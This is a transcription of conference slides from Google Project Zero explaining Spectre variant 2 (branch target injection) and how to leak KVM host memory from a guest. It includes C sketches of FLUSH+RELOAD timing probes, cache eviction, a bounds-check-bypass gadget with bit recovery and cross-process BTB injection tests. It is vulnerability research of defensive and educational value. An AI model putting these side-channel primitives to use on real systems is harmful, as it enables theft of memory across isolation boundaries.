  1. Exploiting Branch Target Injection (Jann Horn, Google Project Zero)

  2. Outline
     ● Introduction
     ● Reverse-engineering branch prediction
     ● Leaking host memory from KVM

  3. Disclaimer
     ● I haven't worked in CPU design
     ● I don't really understand how CPUs work
     ● Large parts of this talk are based on guesses
     ● This isn't necessarily how all CPUs work

  4. Variants overview
     Spectre
     ● Variant 1 (CVE-2017-5753): Bounds Check Bypass
       ○ primarily affects interpreters/JITs
     ● Variant 2 (CVE-2017-5715): Branch Target Injection
       ○ primarily affects kernels/hypervisors
     Meltdown
     ● Variant 3 (CVE-2017-5754): Rogue Data Cache Load
       ○ affects kernels (and architecturally equivalent software)

  5. Performance
     ● Modern consumer CPU clock rates: ~4GHz
     ● Memory is slow: ~170 clock cycles latency on my machine
       ➢ CPU needs to work around high memory access latencies
     ● Adding parallelism is easier than making processing faster
       ➢ CPU needs to do things in parallel for performance
     ● Performance optimizations can lead to security issues!

  6. Performance Optimization Resources
     ● everyone wants programs to run fast
       ➢ processor vendors want application authors to be able to write fast code
     ● architectural behavior requires architecture documentation; performance optimization requires microarchitecture documentation
       ➢ if you want information about microarchitecture, read performance optimization guides
     ● Intel: https://software.intel.com/en-us/articles/intel-sdm#optimization ("optimization reference manual")
     ● AMD: https://developer.amd.com/resources/developer-guides-manuals/ ("Software Optimization Guide")

  7. Out-of-order execution (vaguely based on optimization manuals)
     [Diagram: the front-end decoder turns the instruction stream (add rax, 9; inc rbx; sub rax, rbx; cmp rax, 16; mov [rcx], rax; ...) into a micro-op stream; the out-of-order engine (scheduler, renaming, ...) issues micro-ops to multiple execution ports; results collect in a reorder buffer (~200 entries) and retire]

  8. Data caching
     ● caches store memory in chunks of 64 bytes ("cache lines")
     ● multiple levels of cache
     ● L1D is fast, L3 is slower, main memory is very slow
     ● CLFLUSH (on readable mappings)
     [Diagram: processor core with L1D and L2 caches, shared L3 cache, main memory]

  9. Side Channels, Covert Channels
     ● performance/timing of process A is affected by process B
     ● side channel: process A can infer what process B is doing (uncooperatively)
     ● covert channel: process B can deliberately transmit information to process A
     ● side channels can often also be used as covert channels
     [Diagram: data flows from a victim (leaking) to an attacker (measuring) over a side channel, and from an attacker (sending) to an attacker (receiving) over a covert channel, crossing the intended isolation boundary]

  10. Side Channels, Covert Channels: FLUSH+RELOAD
     For measuring accesses to shared read-only memory (.rodata / .text / zero page / vsyscall page / ...):
     1. process A flushes cache line using CLFLUSH
     2. process B maybe accesses cache line
     3. process A accesses cache line, measuring access time
     Limited applicability, but simple and fast
     [Diagram: victim (leaking) runs foo = ro_array[secret]; attacker (measuring) runs:]
       clflush [addr]
       [... wait ...]
       rdtsc
       mov eax, [addr]
       rdtsc
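     A minimal sketch of the measuring side in C, using GCC/Clang x86-64 intrinsics. The helper names and the hit/miss threshold are illustrative assumptions, not from the talk; the threshold has to be calibrated per machine.

       /* FLUSH+RELOAD probe sketch (x86-64, GCC/Clang intrinsics). */
       #include <stdint.h>
       #include <x86intrin.h>   /* _mm_clflush, _mm_mfence, _mm_lfence, __rdtsc */

       /* Time one access to `addr` in TSC cycles. */
       static uint64_t time_access(const volatile uint8_t *addr) {
           _mm_mfence();
           _mm_lfence();
           uint64_t start = __rdtsc();
           _mm_lfence();
           (void)*addr;                                       /* the reload */
           _mm_lfence();
           return __rdtsc() - start;
       }

       /* One FLUSH+RELOAD round against a cache line shared with the victim. */
       static int line_was_touched(const volatile uint8_t *shared_line,
                                   uint64_t hit_threshold) {
           _mm_clflush((const void *)shared_line);            /* 1. flush the shared line */
           _mm_mfence();
           /* 2. ... wait here while the victim may access the line ... */
           return time_access(shared_line) < hit_threshold;   /* 3. fast reload => hit */
       }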

  11. N-way caches; Eviction
     ● used in data caches and elsewhere
     ● software equivalent: think "hashmap with fixed-size arrays as buckets"
     ● fixed size: adding new entries removes older ones
       ➢ attacker can flush a set from the cache by adding new entries (eviction strategy)
       ○ strategy for Intel L3 caches described in the rowhammer.js paper by Daniel Gruss, Clémentine Maurice, Stefan Mangard
     ● (simplified: Intel L3 set selection is more complex, see research by Clémentine Maurice et al.)
     [Diagram: an address splits into a tag, a set index (log2(num_buckets) bits, e.g. 6), and a line offset (log2(cacheline_size) bits, e.g. 6); each of sets 0..63 holds four tag/value pairs (4-way)]
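     For caches where the set index comes straight from address bits, as in the simplified picture above, an eviction set can be built just by striding through a buffer. A rough, untested sketch with made-up constants follows; as the slide notes, Intel L3 set selection is more complex, so this naive stride is not sufficient there.

       /* Naive cache-set eviction sketch for the simplified N-way picture above:
        * addresses that are SETS*LINE_SIZE bytes apart share a set, so touching
        * more than WAYS of them pushes older entries out. The constants are
        * assumptions; real L3 eviction needs the strategies from the cited papers. */
       #include <stddef.h>
       #include <stdint.h>

       #define LINE_SIZE 64   /* bytes per cache line (assumed) */
       #define SETS      64   /* number of sets (assumed)       */
       #define WAYS       8   /* associativity (assumed)        */

       /* `buf` must span at least (WAYS + 4) * SETS * LINE_SIZE bytes. */
       static void evict_set(volatile uint8_t *buf, uintptr_t target_addr) {
           size_t set = (target_addr / LINE_SIZE) % SETS;      /* set index bits       */
           for (size_t i = 0; i < WAYS + 4; i++)               /* a few extra accesses */
               (void)buf[set * LINE_SIZE + i * SETS * LINE_SIZE];
       }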

  12. Branch Prediction
     ● processor predicts outcomes of branches
     ● predictions are based on previous behavior
     ● predictions help with executing more things in parallel

  13. Misspeculation
     ● Exceptions and incorrect branch prediction can cause “rollback” of transient instructions
     ● Old register states are preserved, can be restored
     ● Memory writes are buffered, can be discarded
       ➢ Intuition: Transient instructions are sandboxed
     ● Cache modifications are not restored!
       ➢ Covert channels matter

  14. Covert channel out of misspeculation
     ● Sending via FLUSH+RELOAD covert channel works from transient instructions
     [Diagram: at an incorrectly predicted branch / faulting instruction, architectural control flow continues with architecturally executed instructions, while the mispredicted target runs transient instructions that send over a cache-based covert channel]

  15. Variant 1: Abusing conditional branch misprediction

       struct array {
         unsigned long length;
         unsigned char data[];
       };
       struct array *arr1 = ...; /* array of size 0x100 */
       struct array *arr2 = ...; /* array of size 0x400 */
       unsigned long untrusted_index = ...; /* >0x100 (OUT OF BOUNDS!) */
       if (untrusted_index < arr1->length) {              /* mispredicted branch; ->length read must be slow! */
         char value = arr1->data[untrusted_index];        /* speculatively unbounded read */
         unsigned long index2 = ((value&1)*0x100)+0x200;
         unsigned char value2 = arr2->data[index2];       /* sending on covert channel */
       }
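     To complete the picture, a sketch of how the transmitted bit could be read back out, assuming the attacker can time accesses to arr2->data (e.g. a same-process PoC) and reusing the hypothetical time_access() helper and includes from the FLUSH+RELOAD sketch above. run_victim_gadget() is a stand-in for training the branch and invoking the code above with the out-of-bounds index.

       /* Attacker side of the Variant 1 gadget above (sketch, untested). */
       int recover_bit(struct array *arr2) {
           /* Flush both candidate lines before triggering the gadget. */
           _mm_clflush(&arr2->data[0x200]);
           _mm_clflush(&arr2->data[0x300]);
           _mm_mfence();

           run_victim_gadget();  /* hypothetical: train the branch, then pass the OOB index */

           /* index2 = ((value & 1) * 0x100) + 0x200, so exactly one line is hot. */
           uint64_t t0 = time_access(&arr2->data[0x200]);   /* hot if the leaked bit is 0 */
           uint64_t t1 = time_access(&arr2->data[0x300]);   /* hot if the leaked bit is 1 */
           return t1 < t0;
       }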

  16. Branch Prediction: Other patterns (UNTESTED)
     ● type check
     ● NULL pointer dereference
     ● out-of-bounds access into object table with function pointers:

       struct foo_ops {
         void (*bar)(void);
       };
       struct foo {
         struct foo_ops *ops;
       };
       struct foo **foo_array;
       size_t foo_array_len;

       void do_bar(size_t idx) {
         if (idx >= foo_array_len)
           return;
         foo_array[idx]->ops->bar();
       }

  17. Indirect Branches
     ● instruction stream does not contain target addresses
     ● target must be fetched from memory
     ● CPU will speculate about branch target

     [code simplified]

       kvm_x86_ops->handle_external_intr(vcpu);

       struct kvm_x86_ops *kvm_x86_ops;

       static struct kvm_x86_ops vmx_x86_ops = {
         [...]
         .handle_external_intr = vmx_handle_external_intr,
         [...]
       };

  18. Variant 2: Basics
     ● Branch predictor state is stored in a Branch Target Buffer (BTB)
       ○ Indexed and tagged by (on Intel Haswell):
         ■ partial virtual address
         ■ recent branch history fingerprint [sometimes]
     ● Branch prediction is expected to sometimes be wrong
     ● Unique tagging in the BTB is unnecessary for correctness
     ● Many BTB implementations do not tag by security domain
     ● Prior research: Break Address Space Layout Randomization (ASLR) across security domains ("Jump over ASLR" paper)
     ● Inject misspeculation to controlled addresses across security domains
     ● Attack goal: Leak host memory from inside a KVM guest

  19. Known predictor internals
     "Jump over ASLR" paper on direct branch prediction:
     ● bits 0-30 of the source go into the BTB indexing function
     ● BTB collisions between userspace processes are possible
     ● BTB collisions between userspace and kernel are possible
     https://github.com/felixwilhelm/mario_baslr:
     ● BTB collisions between VT-x guest and host are possible
     Intel Optimization Manual on Intel Core uarch:
     ● predictions are calculated for 32-byte blocks of source instructions
     ● conditional branches: predicts both taken/not taken and target address
     ● indirect branches: two prediction modes:
       ■ "monotonic target"
       ■ "targets that vary in accordance with recent program behavior"

  20. Minimal Test
     ● run two processes in parallel
     ● on same physical core (hyperthreaded)
     ● same code
     ● same memory layout (no ASLR)
     ● different indirect call targets
     ● process 1: normally measures and flushes test variable in a loop
     ● target injection from process 2 into process 1 can cause extra load
     ● [explicit execution barriers omitted from diagram]
     [Diagram: both processes CLFLUSH the indirect call target pointer, execute a series of N taken conditional branches, then make the indirect call; in process 1 the call is mispredicted and the injected target reads the test variable; process 1 then measures the test variable's access time and CLFLUSHes it]
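     A very rough sketch of one round of the process 1 ("victim") side in C, with hypothetical helper names; it reuses the includes and time_access() helper from the FLUSH+RELOAD sketch. Both processes run the same binary without ASLR on sibling hyperthreads, and, as in the diagram, explicit execution barriers are omitted.

       /* One round of the minimal test, process 1 side (rough sketch). Process 2
        * runs the same code with a different call target, whose BTB entry can
        * transiently divert process 1's indirect call. */
       extern void benign_target(void);          /* what process 1 actually calls     */
       extern volatile uint8_t test_variable;    /* only the injected path loads this */
       void (*volatile call_target)(void) = benign_target;

       static void victim_round(void) {
           _mm_clflush((void *)&call_target);    /* make the target load slow,
                                                    widening the speculation window  */
           _mm_clflush((void *)&test_variable);  /* reset the probe line             */
           _mm_mfence();
           /* ... series of N taken conditional branches (shared branch history) ... */
           call_target();                        /* indirect call; a BTB injection
                                                    from process 2 may transiently
                                                    run code that reads test_variable */
           uint64_t t = time_access(&test_variable);  /* fast reload => injection hit */
           record_timing(t);                     /* hypothetical logging helper       */
       }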

  21. Variant 2: first brittle PoC [in initial writeup]
     ● minimize the problem for a minimal PoC:
       ○ add cheats for finding host addresses
       ○ add cheat for flushing host cacheline with function pointers
     ● use BTB structure information from prior research ("Jump over ASLR" paper)
       ○ Source address: low 31 bits
       ○ "Jump over ASLR" looked at prediction for direct branches!
     ● collide low 31 bits of source address, assume relative target
       ➢ leak rate: ~6 bits/second
       ➢ almost all the injection attempts fail!
       ➢ somehow the CPU can distinguish injections and hypervisor execution
       ➢ Theory:
         ○ injection only works for "monotonic target" prediction
         ○ CPU prefers history-based prediction
         ○ injection works when history-based prediction fails due to system noise causing evictions
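     As a concrete reading of the "collide low 31 bits of source address" step, a tiny hypothetical helper that checks whether a guest training branch is placed so that its source address aliases the targeted hypervisor branch under the "Jump over ASLR" model:

       /* Sketch of the aliasing assumption used by the first PoC: only bits 0-30
        * of the branch source address are assumed to feed BTB indexing, so
        * matching those bits should make the two branches collide. */
       #include <stdint.h>

       static int btb_source_collides(uint64_t guest_branch_src,
                                      uint64_t host_branch_src) {
           return (guest_branch_src & 0x7fffffffULL) == (host_branch_src & 0x7fffffffULL);
       }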
